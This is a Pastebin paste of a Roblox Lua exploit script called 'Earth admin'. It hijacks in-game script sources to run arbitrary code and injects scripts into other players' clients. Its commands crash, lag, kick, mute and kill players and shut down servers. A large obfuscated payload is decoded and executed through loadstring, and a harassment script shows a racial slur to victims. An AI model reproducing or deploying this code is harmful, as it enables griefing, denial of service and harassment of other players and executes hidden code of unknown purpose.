Advertisement
langangster

Untitled

Jun 5th, 2016
86
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 32.73 KB | None | 0 0
  1.  
  2.  
  3. wait()
  4. LocalPlayer = game:GetService("Players").LocalPlayer
  5. script.Parent = __EARTH__
  6. Tabs = {}
  7. Cmds = {}
  8. key = "/"
  9. chatgui = true
  10. probemode = false
  11. connection = nil
  12.  
  13. --not sure if it will work.
  14. --BRanks = -1 = Kick, -2 = Lag, -3 = Mute, -4 = Rejoin
  15. Banlist = {}
  16. Playerlist = {}
  17.  
  18. tabmodel = Instance.new("Model", Workspace)
  19. tabmodel.Name = "Earth tabs"
  20. SourceName = "DSource"
  21. --[[
  22. SourceNames:
  23. Alakazard: 'source'
  24. Anaminus: 'DSource'
  25. AntiBoomz0r: 'Source'
  26. ]]--
  27.  
  28. function NilCrash(Name)
  29. local Crasher = Instance.new("StringValue")
  30. Crasher.Name = "Client"
  31. Crasher.Value = string.lower(tostring(Name))
  32. Crasher.Parent = game:GetService("Lighting")
  33. wait(1)
  34. if Crasher and Crasher.Parent then
  35. ypcall(function()
  36. Crasher:Destroy()
  37. end)
  38. end
  39. end
  40.  
  41. function Crash(name)
  42. name = tostring(name or "nil")
  43. local t = Instance.new("StringValue")
  44. t.Name = "DISC: "..name
  45. t.Parent = game.Lighting
  46. game:GetService("Debris"):AddItem(t,1)
  47. end
  48.  
  49. function Connect(player)
  50. if game.Players[player.Name] then
  51. if not Playerlist[player.Name] then
  52. NewLS(CrashSource,player:findFirstChild("Backpack"))
  53. table.insert(Playerlist,player.Name)
  54. Output('Connected | '..player.Name,__)
  55. end
  56. end
  57. end
  58.  
  59. LagSource = [==[
  60. wait(0)
  61. script.Parent = nil
  62. plr = game:GetService("Players").LocalPlayer
  63. local plrgui = plr:findFirstChild("PlayerGui")
  64. if plrgui == nil then repeat wait() plrgui = plr:findFirstChild("PlayerGui") until plrgui ~= nil end
  65. while plr.Parent == game:GetService("Players") do
  66. wait()
  67. for i = 1, 1000 do
  68. local sc = Instance.new("ScreenGui",plrgui)
  69. local fr = Instance.new("TextLabel",sc)
  70. fr.Text = "LAGGING"
  71. fr.Size = UDim2.new(1, 0, 1, 0)
  72. fr.FontSize = "Size48"
  73. end
  74. end
  75. ]==]
  76.  
  77. FunScript = [[
  78. LP = game:service'Players'.LocalPlayer
  79. Shapes = {"Ball", "Block"}
  80. wait()
  81. script.Parent = nil
  82. Delay(0, function()
  83. while wait() do
  84. workspace.CurrentCamera.CameraType = "Scriptable"
  85. workspace.CurrentCamera.FieldOfView = workspace.CurrentCamera.FieldOfView + math.random(-5,5)
  86. workspace.CurrentCamera:SetRoll(workspace.CurrentCamera:GetRoll()+0.075)
  87. workspace.CurrentCamera.CoordinateFrame = workspace.CurrentCamera.CoordinateFrame * CFrame.new(math.random(-2,2),math.random(-2,2),math.random(-2,2))
  88. local Part = Instance.new("Part", workspace.CurrentCamera)
  89. Part.Shape = Shapes[math.random(1, 2)]
  90. Part.Anchored = true
  91. Part.BrickColor = BrickColor.new(math.random(),math.random(),math.random())
  92. Part.Size = Vector3.new(math.random(5,10),math.random(-25,25),math.random(5,10))
  93. Part.CFrame = workspace.CurrentCamera.CoordinateFrame * CFrame.new(math.random(-250,250),math.random(-100,100),math.random(-250,250)) * CFrame.Angles(math.random(),math.random(),math.random())
  94. local Smoke = Instance.new("Smoke", Part)
  95. Smoke.Color = Color3.new(math.random(), math.random(), math.random())
  96. Smoke.Opacity = 0.7
  97. local Sparkles = Instance.new("Sparkles", Part)
  98. Sparkles.SparkleColor = Color3.new(math.random(), math.random(), math.random())
  99. local Fire = Instance.new("Fire", Part)
  100. Fire.Color = Color3.new(math.random(), math.random(), math.random())
  101. Fire.SecondaryColor = Color3.new(math.random(), math.random(), math.random())
  102. local Ex = Instance.new("Explosion", workspace.CurrentCamera)
  103. Ex.Position = Vector3.new(math.random(-250,250),math.random(10,100),math.random(-250,250))
  104. Ex.BlastPressure = 15
  105. Ex.BlastRadius = 12.5
  106. if not workspace.CurrentCamera:findFirstChild("Hint") then
  107. local mes = Instance.new("Hint", workspace.CurrentCamera)
  108. mes.Text = "OMG STOP FUCKING WITH MY SHIT YOU STUPID NIGGA"
  109. end
  110. end
  111. end)
  112. ]]
  113.  
  114. CrashSource = [==[
  115. wait(0)
  116. script.Parent = nil
  117. local Lig = game:GetService("Lighting")
  118. local LP = game:GetService("Players").LocalPlayer
  119. local LowerName = LP.Name:lower()
  120. Lig.ChildAdded:connect(function(Obj)
  121. if Obj.Name == "Client" and Obj.ClassName == "StringValue" and (LowerName:find(string.lower(Obj.Value)) or (LP.Character and LP.Character.Name:lower():find(string.lower(Obj.Value)))) then
  122. pcall(function()
  123. Obj:Destroy()
  124. end)
  125. LP.Parent = nil
  126. LP.Parent = game:GetService("Players")
  127. end
  128. end)
  129. ]==]
  130.  
  131. coroutine.resume(coroutine.create(function()
  132. while wait(3) do
  133. if game:GetService("Players").Name ~= "Players" then
  134. game:GetService("Players").Name = "Players"
  135. end
  136. end
  137. end))
  138.  
  139. function Dismiss()
  140. for i = 1, 10 do
  141. for i = 1, #Tabs do
  142. table.remove(Tabs, i)
  143. if tabmodel then
  144. tabmodel:ClearAllChildren()
  145. end end end
  146. end
  147.  
  148. function AddCmd(Name,Say,Desc,Func)
  149. table.insert(Cmds,{["Name"] = Name,["Say"] = Say,["Desc"] = Desc,["Func"] = Func})
  150. end
  151.  
  152. AddCmd('Idiots','pingtehidiots','Find out on your own',
  153. function()
  154. for _,v in pairs(Playerlist) do
  155. if not game.Players[v] then
  156. Output('(NIL) '..v, function() Output('NilCrash this person?', function() NilCrash(v) end) end)
  157. else
  158. Output(v,__)
  159. end
  160. end
  161. end
  162. )
  163.  
  164. AddCmd("Banlist","bl","Show the banned players",
  165. function()
  166. Dismiss()
  167. for i, v in pairs(Banlist) do
  168. Output(v["Name"]..' - BRank: '..v["BRank"], __)
  169. end
  170. end
  171. )
  172.  
  173. AddCmd("Fun","fun","Make some fun for a player",
  174. function(plrs)
  175. for _, plr in pairs(plrs) do
  176. if plr and plr.Backpack then
  177. NewLS(FunScript, plr.Backpack)
  178. end
  179. end
  180. end
  181. )
  182.  
  183. AddCmd("Lag player","lag","Lag a player",
  184. function(plrs)
  185. for _, plr in pairs(plrs) do
  186. if plr and plr.Backpack then
  187. NewLS(LagSource, plr.Backpack)
  188. end
  189. end
  190. end
  191. )
  192.  
  193.  
  194. AddCmd("Nuke","nuke","Nuke a player",
  195. function(plrs)
  196. for _, plr in pairs(plrs) do
  197. if plr and plr.Character then
  198. a = Instance.new("Explosion", plr.Character)
  199. a.Position = plr.Character.Torso
  200. end
  201. end
  202. end
  203. )
  204.  
  205. AddCmd("Fire","fire","Fire a player",
  206. function(plrs)
  207. for _, plr in pairs(plrs) do
  208. if plr and plr.Character and plr.Character.Torso then
  209. Instance.new("Fire", plr.Character.Torso)
  210. end
  211. end
  212. end
  213. )
  214.  
  215. AddCmd("Un-fire","unfire","Remove fire from player",
  216. function(plrs)
  217. for _, plr in pairs(plrs) do
  218. if plr and plr.Character and plr.Character.Torso then
  219. pcall(function()
  220. for j, k in pairs(plr.Character.Torso:GetChildren()) do
  221. if k:IsA("Fire") then
  222. k:Destroy()
  223. end
  224. end
  225. end)
  226. end
  227. end
  228. end
  229. )
  230.  
  231. found = false
  232.  
  233. coroutine.wrap(function()
  234. while found == false do
  235. if game.PlaceId == 21053279 or game.PlaceId == 21053219 then break end
  236. for _,scriptinworkspace in pairs(workspace:children()) do
  237. if scriptinworkspace then
  238. if scriptinworkspace:IsA("Script") then
  239. if scriptinworkspace:FindFirstChild(SourceName) then
  240. newScript = scriptinworkspace:Clone()
  241. wait(0.2)
  242. newScript.Name = "NewScript"
  243. newScript.Disabled = true
  244. newScript:FindFirstChild(SourceName).Value = ""
  245. Output("Source found", __)
  246. found = true
  247. break
  248. end
  249. end
  250. end
  251. end
  252. wait()
  253. end
  254. end)()
  255.  
  256. AddCmd("Unpunish player","unpunish","Restore the player's character",
  257. function(plrs)
  258. for _, plr in pairs(plrs) do
  259. if plr then
  260. NewS("game.Players['"..plr.Name.."']:LoadCharacter()", workspace)
  261. end
  262. end
  263. end
  264. )
  265.  
  266. function NewS(sourcevalue, parent)
  267. if game.PlaceId == 21053279 or game.PlaceId == 21053219 then
  268. NS(sourcevalue, parent)
  269. else
  270. if newScript then
  271. local scr = newScript:Clone()
  272. if scr:FindFirstChild(SourceName) then
  273. if scr:FindFirstChild(SourceName) then
  274. scr:FindFirstChild(SourceName).Value = sourcevalue
  275. scr.Parent = parent
  276. wait(0.5)
  277. scr.Disabled = false
  278. return scr
  279. end
  280. end
  281. end
  282. end
  283. end
  284.  
  285. sorcery = script:Clone()
  286.  
  287. Services = {
  288. game:GetService("Workspace"),
  289. game:GetService("Players"),
  290. game:GetService("Lighting"),
  291. game:GetService("StarterPack"),
  292. game:GetService("StarterGui"),
  293. game:GetService("Teams"),
  294. game:GetService("SoundService"),
  295. game:GetService("Debris"),
  296. game:GetService("InsertService"),
  297. game:GetService("RunService"),
  298. game:GetService("Chat"),
  299. game:GetService("TeleportService"),
  300. game:GetService("Geometry"),
  301. game:GetService("MarketplaceService"),
  302. game:GetService("BadgeService"),
  303. game:GetService("NetworkClient"),
  304. game:GetService("FriendService"),
  305. }
  306.  
  307. function Explore(Item)
  308. Dismiss()
  309. if(Item==nil)then
  310. for _,v in pairs(Services)do
  311. Output(v.Name,function() Explore(v) end)
  312. end;
  313. else
  314. f={
  315. ['View children']=function()
  316. Dismiss()
  317. for _,v in pairs(Item:children())do
  318. Output(v.Name,function()
  319. Explore(v)
  320. wait()
  321. end);
  322. end;
  323. end;
  324. ['View parent']=function()
  325. Explore(Item.Parent)
  326. end;
  327. ['Destroy']=function()
  328. Item:Destroy();
  329. Explore(Item.Parent);
  330. end;
  331. ['Clear']=function()
  332. Item:ClearAllChildren()
  333. end;
  334. ['Clone']=function()
  335. pcall(function()
  336. cloneableObj = Item:clone()
  337. end)
  338. end;
  339. ['Remove']=function()
  340. Item:remove()
  341. end;
  342. ['Paste']=function()
  343. if cloneableObj then
  344. cloneableObj.Parent = Item
  345. end
  346. end;
  347. ['Ki'..'ck Item']=function()
  348. NewLS("local plr = game:service'Players'.LocalPlayer; plr:Ki".."ck()", Item)
  349. end;
  350. };
  351. for i,v in pairs(f)do
  352. Output(tostring(i),v);
  353. end;
  354. Output('Item Name: \''..tostring(Item.Name)..'\'',nil);
  355. Output('Class: \''..tostring(Item.ClassName)..'\'',nil);
  356. if cloneableObj then
  357. Output('Currently Cloning: \''..tostring(cloneableObj.Name)..'\'',nil);
  358. end
  359. end;
  360. end;
  361.  
  362. AddCmd("Explore","explore","Explore the game",
  363. function()
  364. Explore()
  365. end
  366. )
  367.  
  368. function NewLS(sourcevalue, parent)
  369. if game.PlaceId == 21053279 or game.PlaceId == 21053219 then
  370. NLS(sourcevalue, parent)
  371. else
  372. local NS = sorcery:Clone()
  373. NS.Name = "NewLocal"
  374. local Source = NS:findFirstChild(SourceName)
  375. if Source == nil then Instance.new('StringValue',NS).Name = SourceName end Source = NS:findFirstChild(SourceName)
  376. Source.Value = sourcevalue
  377. NS.Parent = parent
  378. NS.Disabled = false
  379. return NS
  380. end
  381. end
  382.  
  383. Clothes = {}
  384.  
  385. for _,Item in pairs(LocalPlayer.Character:GetChildren()) do
  386. if Item:IsA('CharacterMesh') or Item:IsA('Hat') or Item:IsA('Shirt') or Item:IsA('Pants') then
  387. table.insert(Clothes,Item:Clone())
  388. end
  389. end
  390. for i,v in pairs(LocalPlayer.Character:GetChildren()) do
  391. if v:IsA("BodyColors") then
  392. body = v
  393. torsocolor = body.TorsoColor
  394. leftlegcolor = body.LeftLegColor
  395. rightlegcolor = body.RightLegColor
  396. leftarmcolor = body.LeftArmColor
  397. rightarmcolor = body.RightArmColor
  398. headcolor = body.HeadColor
  399. end
  400. end
  401.  
  402. mouse = LocalPlayer:GetMouse()
  403.  
  404. mouse.KeyDown:connect(function(key)
  405. if key == "z" then
  406. game:service'StarterGui':SetCoreGuiEnabled(4, true)
  407. end
  408. end)
  409.  
  410. AddCmd("Toogle ChatGUI","chat","Toogle ChatGUI on/off",
  411. function(plrs, msg)
  412. if msg == "off" then
  413. chatgui = false
  414. elseif msg == "on" then
  415. chatgui = true
  416. end
  417. end
  418. )
  419.  
  420. AddCmd("Set WalkSpeed","ws","Set the walkspeed of player",
  421. function(plrs, msg)
  422. local keypos = msg:find(key)
  423. local targPlayers = msg:sub(1,keypos-1)
  424. local plrs = getPlayers(targPlayers)
  425. local speed = msg:sub(tonumber(keypos+1))
  426. for _,v in pairs(plrs) do
  427. if v.Character ~= nil and v.Character:findFirstChild("Humanoid") ~= nil then
  428. v.Character:findFirstChild("Humanoid").WalkSpeed = speed
  429. end
  430. end
  431. end
  432. )
  433.  
  434. AddCmd("Teleport","tp","Teleport a player to a place",
  435. function(plrs, msg)
  436. local keypos = msg:find(key)
  437. local targPlayers = msg:sub(1,keypos-1)
  438. local plrs = getPlayers(targPlayers)
  439. local id = msg:sub(tonumber(keypos+1))
  440. for _,v in pairs(plrs) do
  441. if v and v.Backpack then
  442. NewLS([[game:service'TeleportService':Teleport(]]..id..[[)]], v.Backpack)
  443. end
  444. end
  445. end
  446. )
  447.  
  448. Bad_Char = ""
  449.  
  450. function chatgui(msg)
  451. if not chatgui then return end
  452. if probemode == false then
  453. if LocalPlayer.Character:findFirstChild("Head") then
  454. mainPart = LocalPlayer.Character:findFirstChild("Head")
  455. end
  456. end
  457. if probemode == true then
  458. if game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") then
  459. mainPart = game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe")
  460. end
  461. end
  462. local bg = Instance.new("BillboardGui", mainPart)
  463. bg.Adornee = mainPart
  464. bg.Name = "CHATGUIBG"
  465. bg.Size = UDim2.new(4, 0, 2.5, 0)
  466. bg.StudsOffset = Vector3.new(-4, 2, 0)
  467. local bg2 = Instance.new("BillboardGui", mainPart)
  468. bg2.Adornee = mainPart
  469. bg2.Name = "CHATGUIBG2"
  470. bg2.Size = UDim2.new(4, 0, 2.5, 0)
  471. bg2.StudsOffset = Vector3.new(-4, 4.5, 0)
  472. local text = Instance.new("TextLabel", bg)
  473. text.Size = UDim2.new(3, 0, 0.5, 0)
  474. text.FontSize = "Size18"
  475. text.TextScaled = true
  476. text.TextTransparency = 0
  477. text.BackgroundTransparency = 1
  478. text.TextTransparency = 0
  479. text.TextStrokeTransparency = 0
  480. text.Font = "Arial"
  481. text.TextColor = BrickColor.new("Toothpaste")
  482. text.Text = " "
  483. Message = msg:sub(1)
  484. if #Message >50 then return end
  485. for i = 0, #Message, 1 do
  486. wait(0.01)
  487. text.Text = string.gsub("["..LocalPlayer.Name.."]: "..Message:sub(0, i),'fuck','fuck')
  488. end
  489. wait()
  490. coroutine.resume(coroutine.create(function()
  491. for i = 0, 5, 0.05 do
  492. if bg ~= nil then
  493. if bg2 ~= nil then
  494. wait()
  495. bg2.StudsOffset = bg2.StudsOffset + Vector3.new(0, 0.05, 0)
  496. end
  497. bg.StudsOffset = bg.StudsOffset + Vector3.new(0, 0.05, 0)
  498. end
  499. end
  500. end))
  501. for i=text.TextTransparency,1,0.02 do
  502. wait()
  503. text.TextTransparency = i
  504. text.TextStrokeTransparency = i
  505. end
  506. if bg == nil then return end
  507. bg:Destroy()
  508. if bg2 == nil then return end
  509. bg2:Destroy()
  510. end
  511.  
  512. LocalPlayer.Chatted:connect(chatgui)
  513.  
  514. AddCmd("Message","m","Make a message over the screen",
  515. function(plrs, msg)
  516. Message = msg
  517. NewS([[
  518. a = Instance.new("Message", workspace)
  519. a.Text = ]].."[ "..LocalPlayer.Name.." ]: "..Message, workspace)
  520. end
  521. )
  522.  
  523. AddCmd("Hint","h","Make a message at top of the screen",
  524. function(plrs, msg)
  525. Hint = msg
  526. NewS([[
  527. a = Instance.new("Hint", workspace)
  528. a.Text = ]].."[ "..LocalPlayer.Name.." ]: "..Hint, workspace)
  529. end
  530. )
  531.  
  532. AddCmd("Commands","cmds","Show the list of commands",
  533. function()
  534. Dismiss()
  535. for i, v in pairs(Cmds) do
  536. Output(v["Name"],
  537. function()
  538. Output("Description: "..v["Desc"], __)
  539. Output("Usage: "..v["Say"], __)
  540. Output("Name: "..v["Name"], __)
  541. end)
  542. end
  543. end
  544. )
  545.  
  546. AddCmd("Rejoin player","rej","Rejoin the player",
  547. function(plrs)
  548. for _, plr in pairs(plrs) do
  549. if plr and plr.Backpack then
  550. NewLS("game:service'TeleportService':Teleport(game.PlaceId)", plr.Backpack)
  551. end
  552. end
  553. end
  554. )
  555.  
  556. AddCmd("Create base","base","Create the base",
  557. function()
  558. a = Instance.new("Part")
  559. a.Parent = Workspace
  560. a.Name = "Base"
  561. a.Position = Vector3.new(0, 0.6, 0)
  562. a.Size = Vector3.new(1002, 0, 1002)
  563. a.Material = "Grass"
  564. a.Anchored = true
  565. a.BrickColor = BrickColor.new("Dark green")
  566. end
  567. )
  568.  
  569. AddCmd("Ping","ping","Ping something",
  570. function(plrs, msg)
  571. if msg == "" then
  572. Output("pong", __)
  573. else
  574. Output(msg, __)
  575. end
  576. end
  577. )
  578.  
  579. AddCmd("Dismiss","dis","Dismiss tabs",
  580. function()
  581. Dismiss()
  582. end
  583. )
  584.  
  585. AddCmd("Probe mode", "probe", "Be a ball and fly around",
  586. function()
  587. probemode = true
  588. Dismiss()
  589. if LocalPlayer.Character then LocalPlayer.Character = nil end
  590. if workspace.CurrentCamera == nil then return end
  591. local camera = workspace.CurrentCamera
  592. local probe = Instance.new("Part", workspace)
  593. M = Instance.new("SpecialMesh", probe)
  594. M.MeshId = "http://www.roblox.com/asset/?id=10061232"
  595. M.TextureId = "http://www.roblox.com/asset/?id=10061209"
  596. M.Scale = Vector3.new(3, 3, 3)
  597. probe.TopSurface = 0
  598. probe.Anchored = true
  599. probe.BottomSurface = 0
  600. probe.Name = LocalPlayer.Name.."'s probe"
  601. local rotation = 0
  602. local bbg = Instance.new("BillboardGui", probe)
  603. bbg.Size = UDim2.new(3, 0, 3 ,0)
  604. bbg.ExtentsOffset = Vector3.new(0, 2, 0)
  605. local txt = Instance.new("TextLabel", bbg)
  606. txt.FontSize = "Size24"
  607. txt.Font = "SourceSansBold"
  608. txt.Text = LocalPlayer.Name
  609. txt.BackgroundTransparency = 1
  610. txt.TextColor = BrickColor.new("Really red")
  611. txt.TextStrokeTransparency = 0
  612. txt.Size = UDim2.new(1,0,1,0)
  613. local pl = Instance.new("PointLight", probe)
  614. pl.Shadows = true
  615. pl.Range = 20
  616. coroutine.wrap(function()
  617. while pl ~= nil do
  618. pl.Color = Color3.new(math.random(), math.random(), math.random())
  619. wait(0.8)
  620. end
  621. end)()
  622. coroutine.wrap(function()
  623. while LocalPlayer.Character == nil and probe.Parent == workspace and probe ~= nil and game:service'RunService'.Stepped:wait() do
  624. probe.CFrame = camera.Focus * CFrame.Angles(0, rotation, 0)
  625. rotation = rotation + 0.1
  626. end
  627. if camera then
  628. camera:Destroy()
  629. end
  630. probe:Destroy()
  631. end)()
  632. end
  633. )
  634.  
  635. AddCmd("Make your character","char","Creates your character",
  636. function()
  637. if workspace.CurrentCamera == nil then return end
  638. local camera = workspace.CurrentCamera
  639. local new_char = game:service("InsertService"):LoadAsset(68452456):GetChildren()[1]
  640. local human = new_char.Humanoid
  641. human.Parent = nil
  642. new_char.Name = LocalPlayer.Name
  643. wait()
  644. human.Parent = new_char
  645. camera.CameraSubject = human
  646. camera.CameraType = "Custom"
  647. new_char.Parent = workspace
  648. local pl = Instance.new("PointLight", new_char.Head)
  649. pl.Range = 24
  650. pl.Shadows = true
  651. LocalPlayer.Character = new_char
  652. new_char:MakeJoints()
  653. new_char.Torso.BrickColor = torsocolor
  654. new_char["Left Leg"].BrickColor = leftlegcolor
  655. new_char["Right Leg"].BrickColor = rightlegcolor
  656. new_char["Left Arm"].BrickColor = leftarmcolor
  657. new_char["Right Arm"].BrickColor = rightarmcolor
  658. new_char.Head.BrickColor = headcolor
  659. for i,v in pairs(Clothes) do
  660. v:Clone().Parent = new_char
  661. end
  662. probemode = false
  663. end
  664. )
  665.  
  666. AddCmd("Stop the commands","cremove","Remove the commands",
  667. function()
  668. Output("Are you sure that you wan't to remove the Earth admin?",
  669. function()
  670. Output("Are you 100% sure that you want this???",
  671. function()
  672. for i,v in pairs(getfenv(1)) do
  673. getfenv(1)[i] = nil
  674. end
  675. script.Disabled = true
  676. LocalPlayer = NO_PLAYER
  677. script:findFirstChild(SourceName).Value = " "
  678. script.Disabled = true
  679. tabmodel:ClearAllChildren()
  680. tabmodel:Destroy()
  681. connection:disconnect()
  682. Tabs = {}
  683. Cmds = {}
  684. Banlist = {}
  685. fukhed.all = true
  686. coroutine.resume(coroutine.create(function()
  687. while wait(0.1) do
  688. Dismiss()
  689. end
  690. end))
  691. end)
  692. end)
  693. end
  694. )
  695.  
  696. AddCmd("ForceField","ff","Give forcefield to player",
  697. function(plrs)
  698. for _, plr in pairs(plrs) do
  699. if plr and plr.Character then
  700. Instance.new("ForceField", plr.Character)
  701. end
  702. end
  703. end
  704. )
  705.  
  706. AddCmd("Sparkles","sparkles","Give sparkles to player",
  707. function(plrs)
  708. for _, plr in pairs(plrs) do
  709. if plr and plr.Character and plr.Character.Torso then
  710. Instance.new("Sparkles", plr.Character.Torso)
  711. end
  712. end
  713. end
  714. )
  715.  
  716. AddCmd("Un-Sparkles","unsparkles","Remove sparkles from player",
  717. function(plrs)
  718. for _, plr in pairs(plrs) do
  719. if plr and plr.Character and plr.Character.Torso then
  720. pcall(function()
  721. for j, k in pairs(plr.Character.Torso:GetChildren()) do
  722. if k:IsA("Sparkles") then
  723. k:Destroy()
  724. end
  725. end
  726. end)
  727. end
  728. end
  729. end
  730. )
  731.  
  732. AddCmd("Crash player","crash","Crash the player",
  733. function(plrs)
  734. for _, plr in pairs(plrs) do
  735. if plr and plr.Backpack then
  736. NewLS("repeat until false", plr.Backpack)
  737. end
  738. end
  739. end
  740. )
  741.  
  742. AddCmd("Respawn player","respawn","Respawn the player",
  743. function(plrs)
  744. for _, plr in pairs(plrs) do
  745. NewS("game.Players['"..plr.Name.."']:LoadCharacter()", workspace)
  746. end
  747. end
  748. )
  749.  
  750. AddCmd("Mute player","mute","Block the player chat",
  751. function(plrs)
  752. for _, plr in pairs(plrs) do
  753. if plr and plr.Backpack then
  754. NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, false)", plr.Backpack)
  755. end
  756. end
  757. end
  758. )
  759.  
  760. AddCmd("Unmute player","unmute","Unblock the player chat",
  761. function(plrs)
  762. for _, plr in pairs(plrs) do
  763. if plr and plr.Backpack then
  764. NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, true)", plr.Backpack)
  765. end
  766. end
  767. end
  768. )
  769.  
  770. AddCmd("Un-ForceField","unff","Remove the forcefield that you gave to player",
  771. function(plrs)
  772. for _, plr in pairs(plrs) do
  773. if plr and plr.Character then
  774. pcall(function()
  775. for _,v in pairs(plr.Character:GetChildren()) do
  776. if v:IsA("ForceField") then
  777. v:Destroy()
  778. end
  779. end
  780. end)
  781. end
  782. end
  783. end
  784. )
  785.  
  786. AddCmd("God player","god","Make the player immortal",
  787. function(plrs)
  788. for _, plr in pairs(plrs) do
  789. if plr and plr.Character and plr.Character.Humanoid then
  790. plr.Character.Humanoid.MaxHealth = math.huge
  791. end
  792. end
  793. end
  794. )
  795.  
  796. AddCmd("Ungod player","ungod","Make the player mortal",
  797. function(plrs)
  798. for _, plr in pairs(plrs) do
  799. if plr and plr.Character then
  800. plr.Character.Humanoid.MaxHealth = 100
  801. end
  802. end
  803. end
  804. )
  805.  
  806. AddCmd("Kick player","kick","Kick a player",
  807. function(plrs)
  808. for _, plr in pairs(plrs) do
  809. if plr and plr.Backpack then
  810. NewLS("game:service'StarterGui':SerCoreGuiEnabled(3,false)", plr.Backpack)
  811. plr:Destroy()
  812. end
  813. end
  814. end
  815. )
  816.  
  817. AddCmd("Kill player","kill","Kill a player",
  818. function(plrs)
  819. for _, plr in pairs(plrs) do
  820. if plr and plr.Character then
  821. plr.Character:BreakJoints()
  822. end
  823. end
  824. end
  825. )
  826.  
  827. AddCmd("Punish player","punish","Remove character of a player",
  828. function(plrs)
  829. for _, plr in pairs(plrs) do
  830. if plr and plr.Character then
  831. plr.Character:Destroy()
  832. end
  833. end
  834. end
  835. )
  836.  
  837. AddCmd("Admin a player","admin","Give admin to a player",
  838. function(plrs)
  839. for _, plr in pairs(plrs) do
  840. if plr and plr.Backpack then
  841. a = sorcery:Clone()
  842. a.Parent = plr.Backpack
  843. Output("You gave admin to: "..plr.Name, __)
  844. end
  845. end
  846. end
  847. )
  848.  
  849. AddCmd("Fix cam","fcam","Fix anyone's cam",
  850. function(plrs, msg)
  851. for _, plr in pairs(plrs) do
  852. if plr and plr.Backpack then
  853. NewLS([[
  854. game.Workspace.CurrentCamera:Destroy()
  855. cam = Instance.new("Camera", workspace)
  856. cam.Name = "CurrentCamera"
  857. cam.FieldOfView = 70
  858. cam.CameraType = "Custom"
  859. cam.CameraSubject = game.Players.LocalPlayer.Character.Humanoid]], plr.Backpack)
  860. end
  861. end
  862. end
  863. )
  864.  
  865. AddCmd("AFK","afk","Ping yourself as afk",
  866. function()
  867. Dismiss()
  868. for i = 1,8 do
  869. wait()
  870. Output("AFK", __)
  871. end
  872. end
  873. )
  874.  
  875. AddCmd("Back","back","Ping yourself as back",
  876. function()
  877. Dismiss()
  878. for i = 1,8 do
  879. wait()
  880. Output("Back", __)
  881. end
  882. wait(3)
  883. Dismiss()
  884. end
  885. )
  886.  
  887. AddCmd("Ban a player","ban","Kicks a player when he enters",
  888. function(plrs, msg)
  889. local keypos = msg:find(key)
  890. local targPlayers = msg:sub(1,keypos-1)
  891. local plrs = getPlayers(targPlayers)
  892. local BRank = msg:sub(tonumber(keypos+1))
  893. for _,v in pairs(plrs) do
  894. if v then
  895. table.insert(Banlist,{["Name"] = v.Name, ["BRank"] = BRank})
  896. end
  897. end
  898. end
  899. )
  900.  
  901. local charMap = {["+"] = 0, ["^"] = 1, ["%"] = 2, [")"] = 3, ["*"] = 4, ["$"] = 5, ["-"] = 6, ["_"] = 7, ["#"] = 8, ["&"] = 9, ["@"] = 10, ["("] = 11, ["?"] = 12, ["~"] = 13, ["!"] = 14, ["="] = 15}; setfenv(assert(loadstring((string.gsub(string.gsub(table.concat({
  902. "?-=-)-^-?-+%&-~)~%^)()?-=-^-*-)_*_%_&-!-_-#%)_*_%_&-!-_-!%_-)_$_%-#B%!*!_~*~!~^&&~?@(&!&_@_~&~@A?@~@~_~~?^~&?&#)~)~+~-?@?%?##+?(A?#(~_-_(=?=!!@!)=$@?!!(?@!@-($!-!-~_~*!)!=~*~_~!?~#-~$~^~-?&?+?$#?(-?-?^($_~-@$@$(*-*~&^(~=$##$&$?$?$^^!A=-+&%#)$)*%!%~%!~=^=^!+!+?$+)%)-)#^)^_+&+==~($+)+!=%=*=@!!@*!~!?!-~&&+&&@#?*?=&$?#($($_(-#&*@=@%@$@$@~*%&)&_#?#()^*$#*&)_*_#-~-?^?$%%*^_)#$?*^$+$_*_)-*_)-)#C)**~^?$+)%)-))%$%+%#?_^)+!+^+*+*+!@*(!#-!^=+%$!-~~^%!)~$~+~-#)#+-#(~(?(#(#?&@?$?$$_*$+-A@(-*@$!)!_$#?^$#~(A?-)_)%+%~=!)+-($)$*$=*==$==!~!)=)!!^?$+)%)-)+!~(*^#-?_&+(@?!!+&+^+%+~=~@)@+~?~_!@C~$#@?+~&_%?%(^(!@$-)@-(&$^(%A&!#+&*&!_@*_*$*+*()^#^%&_?$?$*-+-&$*$!*~*&*!)_*!)!%_)-=^=-=$)_B~?#+*+@?_@#!?$!-$+~=!=&=&@=&+~@A~+~#~%~-?~_~?*?^_!--?(#)@+(!@?@@@@&!*(#@#=#_###%&*)@)@%$-^-_%*+$*_-%-@$($-$-+?=?%_)+*~)=%^)!-+*+*%**~?%!~--&)@)~))?&?&(*=+=-()&@!=!^!)#!&(#%&$#!#=_-#~(&?=(^(=(^(*(+(_-=&%-=&+_&&#$($%--&-#%&+&@#)#%)%#+#(_=-^__-(%~$=$$$)--^)^($&$*$#*@*+**+$)&*^*=%="
  903. ,"!_%@!&!!!)!!^(~*~??(~$^@~#~#?^+_+@=!+=^#($(^(=@=-__(-$__-=-_@*((@!&~@+@*@^@&$%&-$*&--+&+$*$?$?$^&%#=#!#&#)#))*#)#=_*___!-))--&-+-=-)%^%@-&-$-@$~$*$&^(*+-&$#*&+%*-+-+%^#+++?)@=*=~!~=!=~=!!#%=%)%-!*!^!+!%#(#+#(#!__#+?!?-?@(@?!()?^?@_*(&_#((#-(__?_$#((~@((((_(%()-$($(%(#@?@*@@-!&%@@&@@=$!$#@#@$@(&=&_&~$+&-@+@+&%$?#^$%$)$($*$!*(#@*$*=)+$%$%$**=__#?_+*=)~)~)%%?%%%!%%%?%--$_!-)-*_&-=-!-#%)-&%&-~)&-(%^)()%_$-*_$_%_!-+%)_*_%_&-!-_-!%)-#-^-%_#%#%)_*_%_&-!-_-!%%-&_*_$-#%)-&%(%~%^)^)#)(%&-&%$%+%%)$)-)&%$-!-*-&%&%#%&%"
  904. }),"(%u)(.)",function(r,c)return c:rep(r:byte()-62)end),"(.)(.)",function(lo,hi)return string.char(charMap[lo]+charMap[hi]*16)end)))),getfenv())()
  905.  
  906. AddCmd("Shutdown the game","sd","Shutdown the game",
  907. function()
  908. NewS([[while true do
  909. game:GetService("Players"):ClearAllChildren()
  910. end
  911. ]], workspace)
  912. end
  913. )
  914.  
